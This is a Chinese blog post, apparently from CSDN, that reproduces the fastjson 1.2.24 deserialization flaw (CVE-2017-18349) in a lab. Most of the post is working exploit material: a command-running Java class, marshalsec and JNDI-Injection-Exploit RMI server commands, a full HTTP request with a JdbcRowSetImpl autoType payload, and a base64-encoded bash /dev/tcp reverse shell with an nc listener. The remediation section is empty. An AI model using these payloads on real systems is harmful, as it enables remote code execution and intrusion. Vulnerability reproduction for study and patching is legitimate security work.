fastjson_1.2.24反序列化漏洞复现

fastjson_1.2.24_unserialize_CVE-2017-18349

说明内容
漏洞编号CVE-2017-18349
漏洞名称fastjson 1.2.24 反序列化漏洞
漏洞评级高危
影响范围fastjson<=1.2.24
漏洞描述fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链
修复方案升级
打补丁
上设备

漏洞描述

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链

漏洞等级

高危

影响版本

  • fastjson<=1.2.24

漏洞复现

基础环境

组件版本
OSkali-linux
Web Serverchrome
fastjson1.2.24

漏洞扫描

使用FastjsonScan进行扫描

  1. 登录页面,进行抓包

    在这里插入图片描述

  2. 修改请求方式为POST,将Content-Type改为application/json,并加上内容

    {
    	"age":25,
    	"name":"Bob"
    }
    

    在这里插入图片描述

  3. 使用Fastjson进行扫描

    在这里插入图片描述

  4. 扫描到漏洞,得到POC

    在这里插入图片描述

漏洞验证

  1. 访问页面,可以看到json格式的输出,进行抓包

    http://192.168.117.163:8090/
    

    在这里插入图片描述

  2. 新建一个TouchFile.java

    // javac TouchFile.java
    import java.lang.Runtime;
    import java.lang.Process;
    
    public class TouchFile {
        static {
            try {
                Runtime rt = Runtime.getRuntime();
                String[] commands = {"touch", "/tmp/success"};
                Process pc = rt.exec(commands);
                pc.waitFor();
            } catch (Exception e) {
                // do nothing
            }
        }
    }
    
  3. 将java文件编译成class文件

    javac TouchFile.java
    

    在这里插入图片描述

  4. 使用python开启站点,浏览器尝试访问

    python -m SimpleHTTPServer  1111
    
    http://192.168.117.163:1111/
    

    在这里插入图片描述

  5. 借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class

    1. 安装marshalsec和mvn

      git clone https://github.com/mbechler/marshalsec.git
      
      cd marshalsec
      
      mvn clean package -DskipTests
      

      在这里插入图片描述

    2. 运行marshalsec(需要进入到target目录)

      java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.117.163:1111/#TouchFile" 9999
      

      在这里插入图片描述

  6. 发送请求包,首先需要将GET包改为REQUEST,将Content-Type改为application/json,在后面加上语句

    POST / HTTP/1.1
    Host: 192.168.117.163:8090
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: zbx_sessionid=49238ed3d29ae14f3a4d158dfa8c26cf; ADMINCONSOLESESSION=0SvVk3LQ3j5nxTC5CnGJnMLGrzhmhLLW2Lnj1SqsWp2fllTs7QMD!890617266; JSESSIONID=1xdky7y3pkyiai5bs4j5fz3rf
    Connection: close
    Content-Type: application/json
    Content-Length: 165
    {
        "b":{
            "@type":"com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName":"rmi://192.168.117.163:9999/TouchFile",
            "autoCommit":true
        }
    }
    

    在这里插入图片描述

  7. 进入镜像查看tmp目录

    sudo docker exec -it [容器id] /bin/bash
    

    在这里插入图片描述

漏洞验证2

  1. 使用Fastjson scan得到的poc

    {"handsome":{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://8w5rathtihicu9qlbri5bu3shjn9by.oastify.com/aaa","autoCommit":true}}
    
  2. 使用JNDI-Injection-Exploit构造rmi服务器

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/cwc" -A "192.168.117.163"
    

    在这里插入图片描述

  3. 在bp中发送rmi

    "dataSourceName":"rmi://192.168.117.163:1099/nilycq",
    

    在这里插入图片描述

  4. 进入容器内部,查看是否生成文件

    udo docker exec -it 8 /bin/bash
    

    在这里插入图片描述

深度利用

命令执行

  1. 将java文件中的{“touch”, “/tmp/success”};进行修改,编译成类,重复验证步骤,就可以做到命令执行
  2. 将工具中的命令修改,可以做到命令执行

GetShell

  1. 构造反弹Shell命令

    bash -i >& /dev/tcp/192.168.117.163/3333 0>&1
    //进行base64编码
    bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExNy4xNjMvMzMzMyAwPiYx}|{base64,-d}|{bash,-i}
    
  2. kali中打开监听

    nc -lnvp 3333
    
  3. 将启动工具的命令进行更改

    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExNy4xNjMvMzMzMyAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.117.163"
    

    在这里插入图片描述

  4. 使用生成的rmi或ldap进行测试

    "dataSourceName":"rmi://192.168.117.163:1099/b79l7k",
    

    在这里插入图片描述

  5. 反弹成功

    在这里插入图片描述

漏洞挖掘

网络测绘

fastjson

修复建议

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值